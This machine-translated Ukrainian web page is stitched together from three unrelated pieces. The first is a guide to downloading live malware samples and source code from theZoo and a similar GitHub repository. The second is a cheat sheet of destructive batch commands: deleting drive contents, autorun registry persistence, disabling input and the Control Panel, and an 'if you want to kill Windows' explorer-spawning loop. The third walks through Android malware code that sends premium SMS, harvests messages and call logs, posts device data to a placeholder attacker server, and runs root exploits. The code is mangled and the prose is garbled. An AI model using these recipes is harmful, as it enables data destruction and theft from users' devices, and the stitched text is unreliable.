Де скачати зразки вірусів з вихідним кодом і докладним описом?

Знайти збірник актуальних вірусів, а вже тим більше з описом і кодами - це завдання не легке. Ми вже розповідали де для аналізу і вивчення. Сьогодні я вам розповім ще про одне джерело на якому можна знайти і скачати але на цей раз не просто малваре знайдена в мережі, а виконавчі файли і исходники вірусів з докладною інформацією.

У цій статті ви дізнаєтеся про парочку цікавих проектів, які пропонують зануритися в світ вихідного коду всіляких троянів, ботнетів, Стіллер, черв'яків і т.д.

• Передмова
• Вихідні тексти вірусів
• проект theZoo
• проект Malware

Навіщо і кому можуть знадобитися зразки вірусів?

Виконувані файли і вихідні вірусів можуть знадобитися для аналізу технологій використовуваних шкідливим ПЗ, для вивчення поведінки вірусів в системі (моніторинг файлової системи, процесів,) і тестування антивірусів. Співробітники антивірусних компаній готові платити гроші для отримання початкових кодів нового вірусу.

Чи законно завантажувати віруси?

Завантажувати зразки вірусів для вивчення і аналізу на своєму комп'ютері ви можете, а от поширювати і заражати ними інших - не можна. Детальніше про це в статті 273 КК РФ.

Мета цих проектів - дати фахівцям антивірусних компаній і людям, хто цікавиться аналізом вірусів, розібратися в пристрої шкідливого коду малварі.

Увага! Майте на увазі, що скачані файли є робочими вірусами. Частина з них будуть намагатися заразити ваш комп'ютер. Ні в якому разі не запускайте викачані файли на основному комп'ютері. Я також не рекомендую завантажувати зразки вірусів без особливих знань аналізу шкідливих програм.

У будь-якому випадку сайт www.сайт не несе ніякої відповідальності за будь-яку шкоду заподіяну вами своїм і чужим комп'ютерам.

Я настійно рекомендую використовувати. Не забудьте про шкідливі черв'яки які будуть намагатися поширитися і вибігти з віртуальної машини. Для уникнення цього я раджу відключати всі гостьові доповнення віртуальних машин, доступ в мережу і т.д. Як це зробити ви можете дізнатися із заслання вище.

Вихідні тексти вірусів: Проект theZoo

Почнемо огляд з проекту theZoo, що перекладається як зоопарк (з гумором у авторів все нормально). Перебувати він в репозиторії Githab.

Проект має на меті зробити доступним вивчення вірусів. Автори збирають і оновлюють базу вірусів. За допомогою theZoo ви зможете отримати доступ до популярних зразкам шкідливого ПЗ.

Зразки вірусів: Проект theZoo

Для скачування і вивчення пропонується як виконуваний файл так і вихідні.

Як користуватися theZoo?

Використовувати проект theZoo можна по різному: прямо з сайту або за допомогою фреймворка. Ми розглянемо обидва способи. Почнемо з першого.

Отже, переходимо на сайт і бачимо кілька директорій і файлів.

Виконувані файли вірусів знаходяться в каталозі:

theZoo / malwares / Binaries /

У ньому ви знайдете виконуваний файл вірусів. Для кожного окремого шкідливий - окрема директорія, в якій знаходяться 4 файлу: саме шкідливе ПО в зашифрованому вигляді в ZIP архіві, SHA256 і MD5 - контрольні суми архіву для порівняння і пароль для зашифрованого архіву.

Виконувані файли вірусів: Троян Androrat

Вихідний код вірусів знаходяться в каталозі:

theZoo / malwares / Source / Original /

У кожному каталозі чотири аналогічних файлу. Все так само як і з виконуваними файлами.

Вихідні тексти вірусів: Троян Dendroid

Для кожного окремого зразка є довідка, але щоб скористатися довідкою необхідно встановити фреймворк.

Для установки фреймворка theZoo використовуємо команду:

git clone https://github.com/ytisf/theZoo

Вимоги: urllib2, python3

Команди: search, use, get, info, list all, report-mal, update-db, exit. Детальніше про командах за допомогою команди help.

Отже, з цим проектом розібралися, тепер розглянемо ще один.

Зразки вірусів: Проект Malware

Проект Malware теж розташований на Githab. Вибір вірусів не такий великий як в зоопарку, але оновлюється частіше. Серед невеликої кількості вредосноних програм можна знайти вихідні коди троянів, ботнетів, здирників, Стіллер паролів і іншого «добра».

Ось список на сьогоднішній день:

• Alina Spark (Троян)
• Bleeding Life 2 (Експол пак)
• Carberp (Ботнет)
• Carberp (Банківський троян)
• Crimepack 3.1.3 (Експлоїт пак)
• Dendroid (Троян для Андроїд)
• Dexter v2 (Троян)
• Eda2, Stolich, Win32.Stolich (Здирник)
• FlexiSpy (Шпигунське ПО)
• (Фреймворк)
• GMBot (Android троян)
• Gozi-ISFB - (Банківський троян)
• Grum (Спам бот)
• Hacking Team RCS ()
• Hidden Tear (Здирник)
• KINS (Банківський троян)
• Mirai (Ботнет інтернету речей)
• Pony 2.0 (Стілер паролів)
• PowerLoader (Ботнет)
• RIG Front-end (Експлоїт пак)
• Rovnix (Бутко)
• Tinba (Банківський троян)
• TinyNuke (Банківський троян)
• Trochilus, RedLeaves (RAT)
• Zeus (Банківський троян)

Вихідний код вірусів: проект Malware

Давайте наприклад зайдемо в папку трояна Alina. Тут нам пропонується кілька директорій, серед яких є і вихідні. Крім того в нижній частині авторами додані посилання на інформацію стосується шкідливий.

ось поесненія команд
assoc .exe \u003d .mp3-Ексешнікі запускаються як музика label E: pridurok-змінюється гвинт на придурок time 00:00 -менять час
date 13.03.36-міняти дату assoc .lnk \u003d .txt-змінюють ярлечкі в тхт файл copy% 0 F: \\ Work.bat-копіювання об'єкта

1) Програма для видалення файлів з флешки (якщо та вставлена) та перейменування її.
del F: \\ *. * / q
label F: HACK
2) Програма для зміни дати і часу на комп'ютері і копіювання її на диск C і на флешку.
time 14:13
date 11.07.12
copy% 0 C: \\ Time.bat
copy% 0 F: \\ Time.bat
----------
\u003e Nul-приховувати рядок команду
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton-міняє місцями клавіші миші
---------------
copy «»% 0 "» «% SystemRoot% \\ system32 \\ File.bat»
reg add «HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run» / v «Filel» / t REG_SZ / d "% SystemRoot% \\ system32 \\ File.bat» / f
reg add HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer / v NoControlPanel / t REG_DWORD / d 1 / f
Дуже жорстока команда: додає програму в автозавантаження ОС.
«Del x: \\ y *. * / Q» - видалить всі файли на диску х в папці у (крім папок) (приклад del F: \\ Data *. * / Q);
«Net user« х »/ add» - додасть на комп'ютер користувача під ім'ям х (приклад net user «Smoked» / add);
«@Echo off» вводитися на початку нашого вірусу і приховує все
rundll32 user, disableoemlayer - збій системи (!) - вимкнути всі функції введення-виведення (клавіатура, дисплей, миша). В результаті буде чорний екран з курсором і ні на що не реагує система, однак Windows продовжує працювати.
del *. * / q (після запуску цієї команди всі файли крім папок які були в тій папці де був запущений вірус удалатся !!!
md 1-створення папок
Для запуску файлу під час завантаження Windows, перейменуйте файл в Autoexec.bat
Echo Virus Loading-напис на екран вірус Лодін
del c: Program Files / q (видаляє всі файли з цієї папки)
reg - безпосередня робота з реєстром. Дивитися reg /? всім!
rcp - обмін файлами через rcp в ascii
runas - від імені користувача
tasklist - відображає програми та сеанси, пов'язані з ним.
taskkill - дозволяє завершити один або кілька процесів
tftp - trivial ftp
tskill - вбити процес
reg - утиліта взаємодії з реєстром
bootcfg - настройка boot.ini
append - дозволяє відкривати віддалені файли так, немов вони знаходяться в поточному.
getmac - отримати мас
logoff - Заверщіть призначений для користувача сеанс.
mem - висновок на екран відомостей про поточні процесах в ОЗУ
mqbkup - архівування
netsh - ??
openfiles - переглянути відкриті файли.
rsh - виконання команд на віддалених вузлах з запущеними rsh
sc - command line ??
rexec - виконання команд на віддалених вузлах з запущеними rexec
shutdown - вимкнути (хе-хе) local or remote computer.
systeminfo - висновок інформації про компі.
schtasks - планувальник завдань.
xcopy - копіювання файлів і каталогів.
tsshutdn - завершення роботи сервера в встановленому порядку.
set - висновок, завдання і видалення змінних середовища cmd.exe. Властивості системи (пр.кн. "мій комп") - додатково - Змінні середовища. Там не всі змінні, але багато! Всі дивитися просто set.
До речі, ось деякі RunDLL команди, які можуть використовуватися при створенні батники

rundll32 user, wnetdisconnectdialog
Вікно "Відключення мережевого диска" Викликати

rundll32 user, disableoemlayer
збій пpовоціpовать

rundll32 user, repaintscreen
Оновити (як)

rundll32 user, setcursorpos
Maus-Cursor зліва ввеpх посадити

rundll32 diskcopy, DiskCopyRunDll
Вікно "Copy Disk" викликати

rundll32 rnaui.dll, RnaWizard / 1
Діалог "Установка Зв'язки" викликати (/ 1 \u003d без вікна)

rundll32 shell, shellexecute
Explorer-Вікно відкрити в коpневом каталозі

rundll32 shell32, OpenAs_RunDLL
Вікно "Відкрити за допомогою ..." викликати ***

rundll32 shell32, SHFormatDrive
Вікно "Фоpматіpованіе: Діск3,5 (А)" викликати

rundll32 shell32, ShellAboutA
Info-Box (про Windows) викликати

rundll32 shell32, SHExitWindowsEx 0
Windows 98 заново стаpтанyть (без autoexec.bat тa ін.)

rundll32 shell32, SHExitWindowsEx 1
Работy з Windows 98 закінчити

rundll32 shell32, SHExitWindowsEx 2
Windows-98-PC boot

rundll32 shell32, SHExitWindowsEx -1
Windows-98-Explorer стаpтанyть заново

rundll32 shell32, Control_RunDLL
Відкрити вікно "Панель yпpавленія"

rundll32 shell32, Control_RunDLL desk.cpl
Відкрити "Властивості екрана"

rundll32 shell32, Control_RunDLL main.cpl
Відкрити Modul-Панелі yпpавленія з MAIN.CPL **

rundll32 krnl386.exe, exitkernel
вихід з Windows без будь-яких повідомлень / вопpосов

rundll32 user, swapmousebutton
"Пеpеставіть" клавіші миші *

rundll32 keyboard, disable
"Відключити" клавіатypy *

rundll32 mouse, disable
"Відключити" миша *

rundll rnaui.dll, RnaDial "провайдера"
Викликати вікно "Установка зв'язку" з ім'ям "провайдера"

rundll32 user, tilechildwindows
вистpоіть все не свёpнyтие вікна свеpхy вниз

rundll32 user, cascadechildwindows
вистpоіть все не свёpнyтие вікна каскадом

rundll32 sysdm.cpl, InstallDevice_Rundll
(Єдностей. Можливість в W98) yстановіть non-Plug & Play обоpyдованіе

rundll32 msprint2.dll, RUNDLL_PrintTestPage
вИБІР в меню пpинтеp і послати а нього тест

rundll32 user, setcaretblinktime
yстановіть новyю частотy миготіння кypсоpа *

rundll32 user, setdoubleclicktime
yстановіть новyю швидкість подвійного натискання *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C: \\ file.inf
вікно "Пеpезапyск системи. Пpоізвесті її зараз? ь Так / ні ь "****

ASSOC - Показує або модифікує зв'язку розширень файлів
AT - Чи планує команди і програми для виконання на комп'ютері.
ATTRIB - Показує або змінює атрибути файлу.
BREAK - Встановлює або скасовує перевірку комбінації.
CACLS - Показує або модифікує списки управління доступом (ACLs) для файлів.
CALL - Викликає один * .BAT-файл з іншого.
CD - Показує ім'я або змінює ім'я поточної директорії.
CHCP - Показує або встановлює номер активної кодової сторінки.
CHDIR - Показує ім'я або змінює ім'я поточної директорії.
CHKDSK - Перевіряє диск і відображає звіт про стан.
CLS - Очищає екран.
CMD - Стартує новий екземпляр інтерпретатора команд Windows NT.
COLOR - Встановлює типовий колір для переднього і заднього плану консолі.
COMMAND - Стартує нову копію інтерпретатора команд Windows.
COMP - Порівнює вміст двох файлів або установки файлів.
COMPACT - Відображає або видозмінює стиснення файлів на патриціїв Windows NT (NTFS).
CONVERT - Конвертує FAT томів до формату файлової системи Windows NT (NTFS). Ви не можете конвертувати поточний диск.
COPY - Копіює один або більше файлів на інше місце.
CTTY - Змінює термінальний пристрій, що використовується для управління вашою системою.
DATE - Показує або встановлює дату.
DEL - Видаляє один або більше файлів.
DEBUG - Виконує налагодження, тестування програм і редагування інструментальних засобів.
DIR - Показує список файлів і піддиректорій в директорії.
DISKCOMP - Порівнює вміст двох дискет.
DISKCOPY - Копіює вміст однієї дискети на іншу.
DOSKEY - Редагує командні рядки, відновлює команди Windows і створює макрос.
ECHO - Показує повідомлення, або включає / вимикає висновок команд.
EMM386 - Включає / вимикає підтримку розширеної пам'яті EMM386.
ENDLOCAL - Закінчує локалізацію змін навколишнього середовища в * .BAT-файлі.
ERASE - Видаляє один або більше файлів.
EXIT - Припиняє виконання програми (інтерпретатор команд).
EXTRACT - Засіб вилучення інформації з CAB - файлів.
FC - порівнює два файли або установки файлів, і відображає відмінність між ними.
FIND - Шукає текстовий рядок в файлі або файлах.
FINDSTR - Пошук рядків у файлах.
FOR - Виконує зазначену команду для кожного файлу в наборі файлів.
FORMAT - Форматує диск для використання з Windows.
FTYPE - Показує або модифікує типи файлів, які використовуються в зв'язках розширень.
GOTO - Направляє інтерпретатор команд Windows NT до поміченого рядку в * .BAT-файлі.
GRAFTABL - Здатність Windows відображати символи псевдографіки, вставлені в графічному режимі.
HELP - Забезпечує інформацію Help для команд Windows.
IF - Виконує обробку умови в * .BAT-файлі.
KEYB - конфігурується клавіатуру для заданого мови.
LABEL - Створює, змінює, або видаляє мітку тому на диску.
LOADHIGH (LH) - завантажує програму в верхні адреси пам'яті.
MD - Створює директорію.
MEM - Показує величину використовуваної і вільної пам'яті у вашій системі.
MKDIR - Створює директорію.
MODE - конфігурується системне пристрій.
MORE - Показує висновок одного екрану за раз.
MOVE - переміщує один або більше файлів з однієї директорії в іншу на тому ж диску.
NETSTAT - Показує статистики протоколів і поточних мережевих з'єднань TCP / IP.
NLSFUNC - Завантажує інформацію, специфічну для країни.
PATH - Показує або встановлює шлях пошуку для виконуваних файлів.
PAUSE - Припиняє обробку * .BAT-файлу і відображає повідомлення.
POPD - Відновлює попереднє значення поточної директорії, збереженої по PUSHD.
PRINT - Друкує текстовий файл.
PROMPT - Змінює підказку до командам Windows.
PUSHD - Зберігає поточну директорію, потім змінює.
RD - Видаляє директорію.
RECOVER - Відновлює читану інформацію з поганого або дефектного диска.
REM - Записує коментарі (примітки) в * .BAT-файли або CONFIG.SYS.
REN - перейменують файл або файли.
RENAME - перейменують файл або файли.
REPLACE - Замінює файли.
RESTORE - Відновлює файли, які були архівовані з використанням команди BACKUP.
RMDIR - Видаляє директорію.
SET - Показує, встановлює або видаляє змінні середовища Windows.
SETLOCAL - Починає локалізацію змін середовища в * .BAT-файлі.
SETVER - Встановлює номер версії MS-DOS, який Windows повідомляє програмі.
SHIFT - Зрушує позицію заміщаються параметрів в * .BAT-файлі.
SMARTDRV - встановлюють і конфигурирует утиліту кешування диска SMART - драйву.
SORT - Сортує вхідний потік.
START - Стартує окреме вікно для виконання зазначеної програми або команди.
SUBST - Пов'язує шлях з літерою диска.
SYS - Копіює файли системи MS-DOS і інтерпретатор команд на вказаний вами диск.
TIME - Показує або встановлює системний час.
TITLE - Встановлює заголовок вікна для сеансу.
TREE - Графічно відображає структуру директорія в драйві або шлях.
TYPE - Показує вміст текстового файлу.
VER - Показує версію Windows.
VERIFY - Повідомляє Windows, перевіряти чи правильність запису файлів на диск.
VOL - Показує мітку дискового тому і серійний номер.
XCOPY - Копіює файли і дерева директорії.

Ну а якщо хочеш "вбити" Windows то:
@echo off
start explorer
start explorer
start explorer
start explorer - повторити ще раз 100 і прописати в автозавантаження.

У колекції шкідливих Android-додатків деяких антивірусних лабораторій міститься вже більше 10 мільйонів зразків. Ця цифра розбурхує уяву, але приблизно 9 мільйонів 995 тисяч з них - перейменовані копії оригінальних вірусів. Але якщо проаналізувати вихідний код залишилися декількох тисяч зразків малварі, то можна помітити, що всі вони комбінуються з невеликої кількості унікальних функціональних блоків (кілька видозмінених і по-різному скомбіновані).

Вся справа в тому, що вірмейкери найчастіше переслідують досить тривіальні завдання:

• відправити есемеску на платний номер;
• заволодіти конфіденційною інформацією користувача (телефонними номерами, текстами повідомлень, даними з SD-карти і так далі);
• зібрати дані про зараженому пристрої;
• заволодіти адміністраторськими правами на пристрої (для установки додатків без дозволу власника або для зловмисного виведення апарату з ладу);
• відстежити логіни, паролі та дані платіжних карт, які користувач вводить на сайтах систем інтернет-банкінгу. Як вони це роблять? Спробуємо проникнути в похмурий світ мобільного вірмейкінга і подивитися, що там відбувається.

Відправка SMS

Хто використовує:

• AdSms;
• FakePlayer;
• HippoSms.

Найпоширенішим типом вірусів є SMS-трояни. Ці віруси просто відправляють повідомлення на платні номери без згоди користувача. Створити таку програму або переписати готову під потрібний номер зовсім легко. Та й процес отримання вигоди гранично спрощений - на відміну, наприклад, від відстеження банківських даних.

Далі наведено найпростіший приклад коду. Це елементарна функція відправки SMS. Її можна ускладнити перевіркою статусу відправки, вибором номерів в залежності від місця положення абонента і подальшим видаленням SMS.

Private static SendSms (String DestNumber, String SmsText) (// Спроба запуску методу sendTextMessage об'єкта SmsManager (стандартна програма для відправки SMS у поточного пристрою) з мінімальною кількістю параметрів: номер одержувача і текст повідомлення try (SmsManager.getDefault (). SendTextMessage (DestNumber , , SmsText, , null); return true;))

Де шукати код вірусу

В абсолютній більшості випадків зараження телефону відбувається через установку додатків. Будь-який додаток для Android існує у вигляді файлу з розширенням apk, який, по суті, є архівом. Переглянути його вміст можна за допомогою Android SDK, конвертера файлів APK в JAR і декомпілятори Java-байт-коду. Збірка додатки (APK) складається з наступних частин:

• resources.arsc - таблиця ресурсів;
• res (папка) - власне ресурси (іконки та інше);
• META-INF (папка) - містить файли з наступним змістом: контрольні суми ресурсів, сертифікат програми та опис збірки APK;
• AndroidManifest.xml - всякого роду службова інформація. У тому числі дозволи (permission), які додаток запитує перед установкою для своєї коректної роботи;
• classes.dex - ти напевно чув, що в Android операційних системах весь код виконується за допомогою Dalvik virtual machine (починаючи з версії 4.4 з'являється підтримка ART), яка не розуміє звичайний Java-байт-код. Тому й існують файли з розширенням dex. У ньому, поряд з потрібними і корисними класами (які відповідають за функціонал додатка), містяться також і шкідливі (вірусний код, який ми розбираємо в цій статті).

Запис інформації користувача в текстовий файл

Хто використовує:

• NickySpy;
• SmsSpy.

Існує категорія вірусів, яка полює за персональними даними користувачів. Механізм їх дії також нескладний. Вони або завантажують на сервер свого творця файли користувача, або попередньо збирають будь-які дані в txt (CSV, XML - байдуже). Інтерес для зловмисників можуть представляти контакти будь-якого типу, повідомлення з різних месенджерів, медіафайли та інше.

SMS заражених користувачів особливо цінні номерами телефонів відправників і одержувачів - ними можна поповнити базу для спам-розсилок. Рідше віруси такого роду використовуються для зараження пристроїв конкретних особистостей - в наступний раз, коли твоя дівчина запропонує тобі протестувати написане їй (ай, карамба! - Прим. Ред.) Додаток на Android, не втрачай пильності :).

// Вважаємо кількість SMS на пристрої arrayOfObject \u003d (Object) localBundle.get ( "pdus"); int j \u003d arrayOfObject.length; // Обходимо по циклу кожну SMS i \u003d 1 while (true) (if (i\u003e \u003d j) break; // Створюємо об'єкт SMS-повідомлення SmsMessage localSmsMessage \u003d SmsMessage.createFrompdu ((byte) arrayOfObject [i]); // Кладемо в рядкові змінні номер відправника, текст і час відправки SMS String MessageNumber \u003d localSmsMessage.getOriginatingAddress (); String MessageText \u003d localSmsMessage.getDisplayMessageBody (); long l \u003d localSmsMessage.getTimestampMillis (); Date localDate \u003d new Date (l); String MessageTimeDate \u003d new SimpleDateFormat ( "yyyy-MM-dd HH: mm: ss"). format (localDate); // Формуємо з отриманих даних рядок і записуємо її в текстовий файл призначеним для користувача методом WriteRec String MessageInfo \u003d 7MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // Переходимо до наступного повідомлення i + \u003d 1;) Також спам-лист зручно поповнювати з історії викликів абонента. Ось такий код може запускатися при вхідному дзвінку: If (parmIntent.getAction (). Equals ( "android.intent.action.NEW_OUTGOING_CALL")) (// Кладемо в змінну номер абонента String phonenumber \u003d paramIntent.getStringExtra ( "android.intent. extra.PHONE_NUMBER "); // Формуємо рядок з номера і дати дзвінка String PhoneCallRecord \u003d phonenumber +" # "+ getSystemTime (); // Викликаємо метод WriteRec () (його код тут не наводиться), який додає рядок в текстовий файл з історією дзвінків WriteRec (paramContext, "phonecall.txt", PhoneCallRecord);)

Після того як інформація записана, вона переправляється в «потрібні руки». Наведений нижче код завантажує історію дзвінків на сервер:

Private void uploadPhonecallHistory () throws IDException (while (true) (return; // Перевіряємо, чи є потрібний нам файл if (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt ")) continue; // створюємо об'єкт - завантажувач файлів UploadFiles localUploadFiles \u003d new UploadFiles (); String uploadkeynode \u003d getKeyNode ( "uid", "uid_v"); // Запускаємо метод.advanceduploadfile (його код тут не наводиться) для завантаження файлу на сервер «вірусмейкера» localUploadFiles. advanceduploadfile (uploadkeynode, "/ data / data / spyapp.pg / files / phonecall.txt");))

Збір інформації

Хто використовує:

• DroidKungFu;
• DroidDream;
• переважна більшість малварі всіх аналогічних.

В принципі, будь-якого вірусмейкеру корисна інформація про заражені його програмами пристроях. Отримати її дуже просто. Створюється масив з даними про властивості телефону (їх повний список можна подивитися в керівництві Android-розробника) і відправляється POST-запитом до PHP-скрипту (мова непринциповий) на сервері зловмисника, той обробляє дані і поміщає їх в базу даних для подальшого використання.

Private void reportState (int paramInt, string paramString) (// Створюємо масив і кладемо в нього службову інформацію ArrayList UserInformation \u003d new ArrayList (); UserInformation.add (new BasicNameValuePair ( "imei", this.mImei)); UserInformation.add ( new BasicNameValuePair ( "taskid", this.mTaskId)); UserInformation.add (new BasicNameValuePair ( "state", Integer.toString (paramInt))); // Якщо у функції визначено параметр «paramString (коментар)», кладемо в масив і його if (paramStrng! \u003d null) && (! "". equals (paramString))) UserInformation.add (new BasicNameValuePair ( "comment", paramString)); // Створюємо HTTP POST запит з адресою скрипта, який здійснює збір даних HttpPost localHttpPost \u003d new HttpPost ( "http://search.virusxxxdomain.com:8511/search/rtpy.php"); try (// Додаємо в запит наш масив з даними і виконуємо його за допомогою стандартного HTTP-клієнта localHttpPost.setEntity (new UrlEncodeFormEntity (UserInformation, "UTF-8"))); new DefaultHttpClient (). execute (localHttpPost) .getStatusLine.getStatusCode (); return; ))

Рутінг

Хто використовує:

• DroidKungFu;
• DroidDream;
• RootSmart.

Одна з найнеприємніших речей, яка може статися з Android-пристроєм, - це його рутінг вірусом. Адже після цього шкідлива програма може робити з ним що завгодно: встановлювати інші віруси, змінювати налаштування апаратного забезпечення. Здійснюється це дійство шляхом послідовного запуску експлойтів:

Private void RootFunc () (ApplicationInfo localApplicationInfo \u003d getApplicationInfo (); / * "ratc" - це копія знаменитого root-експлойта Rage Against The Cage. Kiall - зупинка всіх процесів, запущених поточним додатком. Gjsvro - експлойт для придбання прав udev (використовуються в Linux-системах для розширеної роботи з апаратним забезпеченням і мережевими інтерфейсами). Все це копіюємо в потрібне місце * / Utils.copyAssets (this, "ratc", "/ data / data" + localApplicationInfo.packageName + "/ ratc"); Utils .copyAssets (this, "killall", "/ data / data" + localApplicationInfo.packageName + "/ killall"); Utils.copyAssets (this, "gjsvro", "/ data / data" + localApplicationInfo.packageName + "/ gjsvro "); // І запускаємо за допомогою командного рядка Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ ratc"); Utils.oldrun ( "/ system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ killall"); Utils.oldrun ( "/ system / bin / chmod", "4755 /data/data"+localApplicationInfo.packag eName + "/ gjsvro"); new MyTread.start (); )

Сайти про мобільний малварі

Блог експертів компанії Kasperskiy Lab Цей ресурс містить якісні і докладні статті про багатьох аспектах комп'ютерної безпеки, в тому числі і про Android-віруси. Варто регулярно відвідувати цей сайт, щоб бути в курсі останніх подій.

Група присвячена open source інструменту для всіляких маніпуляцій з кодом Android-додатків (декомпіляція і модифікація DEX / ODEX / APK файлів і так далі). Androguard також містить велику базу статей про віруси. Крім коротких оглядів функціоналу і методів захисту, зустрічаються докладні аналізи коду малварі.

Розділ Mobile Threats на www.fortiguard.com Енциклопедії телефонних вірусів. Кожна стаття - огляд функціоналу, приправлений значною кількістю технічних деталей. Крім інформації про загрози для операційної системи Android, є статті і про віруси для Symbian OS, iOS і інших платформ.

Захист від вірусів

Деякі користувачі вважають, що якщо завантажувати додатки виключно з Google Play і встановити на смартфон антивірус, то це стовідсотково гарантує безпеку. Не варто спокушатися: в Мережі регулярно з'являються повідомлення про знаходження малварі в офіційному маркеті. А кількість новопосталих шкідливих програм вимірюється сотнями тисяч в місяць, що ускладнює їх своєчасне потрапляння в бази антивірусних програм. Реальну гарантію безпеки може дати річний перегляд коду APK-файлу перед установкою його на телефон. Не потрібно бути гуру кодинга, щоб помітити шкідливі фрагменти. А наша стаття допоможе тобі в цьому.

висновок

Як ми бачимо з прикладів, мобільний вірмейкінг технологічною складністю не відрізняється. Звичайно, дані приклади спрощені під формат журналу - перш за все, втрачені обробники помилок і виключень, а також окремі технічні дрібниці, відсутність яких не завадить тобі зрозуміти принципи роботи Android-малварі, але убезпечить від непотрібних експериментів. Адже ми не підтримуємо створення вірусів, чи не так? 🙂